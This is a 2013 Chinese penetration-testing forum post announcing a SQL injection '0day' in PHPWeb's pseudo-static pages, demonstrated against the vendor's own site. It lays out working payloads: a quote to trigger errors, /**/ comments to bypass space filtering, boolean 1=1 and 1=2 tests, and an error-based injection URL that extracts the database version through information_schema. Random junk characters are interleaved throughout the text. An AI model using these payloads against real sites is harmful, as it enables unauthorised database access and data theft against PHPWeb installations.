找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
返回列表 发新帖
查看: 2663|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
+ P" Z1 ]5 E5 Y& \$ [( C6 D# R* M: G/ w0 u: i  g
主站:http://phpweb.net/
1 h3 A; C2 Q0 S& q3 |' U/ g加’检测:/ p: }, \$ i. e* \9 _5 P( i
# d5 p+ N2 {0 K; @% z! g' @
http://www.phpweb.net/down/html/?772′.html
9 |6 u$ M- Y" n% z  h
6 B& B1 s* {9 O- I- e出错; k8 Y1 X9 {5 A. K$ s7 h6 }) y+ U! I
存在注入。, N) J3 a1 f8 d) [
不能用空格,只能用/*罗/ a# J1 u- A% F/ m1 u8 [
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
! B5 `! r$ D' z
; m4 H% Y- v, ^9 Ahttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
$ e% W1 ~* h# \& ]( A% [爆数据库版本:; e8 m& s1 s- S$ O. u
8 U. S- `4 y6 L& b: h" D6 I% w
?
* {$ g" `. K$ L$ I6 V6 z1* x9 Y7 f! l; q6 W* N, E
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
% K, H: h6 ]4 N2 `, A1 k更新日期: 2013-01-03 13:39:50        
8 B: `" D0 ~7 ~3 J" I' Q( v
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表